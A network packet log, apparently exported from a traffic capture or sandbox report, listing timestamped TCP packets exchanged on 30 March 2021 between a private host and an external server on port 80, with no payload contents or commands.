Mar 30, 2021 14:22:52.392738104 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.392765045 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392800093 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.392802954 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392843962 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392882109 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392884016 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.392919064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392952919 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.392957926 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392997026 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.393012047 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.393045902 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.393086910 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.393089056 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.393129110 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.393172026 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.393219948 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.394099951 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.396373987 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.482960939 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.483006954 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.483028889 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.483052015 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.483072996 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.483095884 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.483115911 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.483122110 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.483143091 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.483166933 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.483187914 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.483203888 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.483211040 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.483232975 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.483247995 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.483253956 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.483277082 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.483288050 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.483320951 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.485343933 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485400915 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485440016 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.485451937 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485472918 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485490084 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485507011 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.485512018 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485538960 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485554934 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.485563040 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485584021 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485605001 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485625982 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485629082 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.485646963 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485668898 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485675097 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.485690117 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485718012 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485722065 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.485740900 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485763073 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485769987 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.485785961 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485806942 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485826969 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485827923 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.485850096 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485871077 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485872030 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.485897064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485919952 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485940933 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485953093 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.485963106 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485985041 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.485996008 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486004114 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486026049 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486047983 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486058950 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486074924 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486092091 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486098051 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486119986 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486141920 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486143112 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486162901 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486183882 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486183882 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486206055 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486227036 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486228943 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486253977 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486274004 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486278057 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486300945 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486316919 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486321926 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486345053 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486365080 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486365080 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486387014 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486407042 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486407995 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486433983 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486457109 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486455917 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486479044 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486499071 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486500978 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486525059 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486545086 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486563921 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486566067 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486587048 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486612082 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486634970 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486645937 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486656904 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486669064 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486682892 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486704111 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486725092 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486736059 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486746073 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486767054 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486776114 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486793041 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486815929 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486825943 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486835957 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486857891 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486877918 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486877918 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486901045 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486922026 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486922026 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486943007 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486968040 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.486970901 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.486994982 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487010002 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.487015009 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487039089 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487060070 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487065077 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.487082005 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487102985 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487113953 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.487124920 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487152100 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487165928 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.487175941 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487195969 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487217903 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487221003 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.487241030 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487261057 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487262964 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.487282038 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487302065 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487313032 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.487329960 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487353086 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487360954 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.487375021 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487396002 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487406969 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.487417936 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487438917 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487452984 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.487461090 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487483025 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487509012 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487509966 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.487533092 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487554073 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487560987 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.487572908 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.487613916 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.487668037 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.568748951 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.568816900 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.568860054 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.568881989 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.568900108 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.568939924 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.568969965 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.568989992 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.569025993 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.569056034 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.569070101 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.569087029 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.569132090 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.569170952 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.569171906 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.569211960 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.569258928 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.569259882 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.569305897 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.569329023 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.569416046 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.572808981 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.572886944 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.572912931 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.572932005 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.572973013 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.572988987 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.573012114 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573052883 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.573054075 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573095083 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573118925 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.573133945 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573173046 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573213100 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.573220968 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573265076 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573275089 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.573302984 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573343039 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573374987 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.573410988 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573457003 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573462963 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.573496103 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573523045 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.573549032 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573590040 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573627949 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573631048 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.573668003 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573709011 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573725939 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.573757887 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573797941 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.573801041 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573839903 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573857069 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.573884964 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573925018 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.573947906 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.573964119 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574003935 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574043036 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574053049 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.574095964 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574115992 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.574140072 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574179888 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574189901 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.574219942 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574259043 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574280024 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.574300051 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574340105 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574377060 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574393034 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.574426889 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574466944 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.574470043 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574510098 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574534893 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.574548960 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574588060 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574625969 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574626923 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.574666023 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574704885 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574712038 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.574753046 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574778080 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.574795961 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574836016 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574841976 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.574876070 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574914932 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574939013 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.574953079 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.574992895 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.575048923 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.575115919 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.654412985 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.654463053 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.654484034 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.654504061 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.654527903 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.654548883 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.654568911 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.654589891 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.654613018 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.654625893 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.654635906 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.654659986 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.654685974 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.654782057 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.654889107 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.660365105 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660415888 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660434961 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660455942 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660495043 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660516024 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660538912 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660558939 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660577059 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660595894 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.660604954 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660630941 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660655022 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660679102 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660702944 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660727024 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660753965 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660778999 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660801888 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660824060 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660846949 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660870075 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660873890 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.660893917 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660903931 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.660917997 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660943985 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660968065 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.660990953 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661016941 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661040068 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661050081 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.661065102 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661088943 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.661113977 CEST	80	49744	45.139.236.6	192.168.2.4
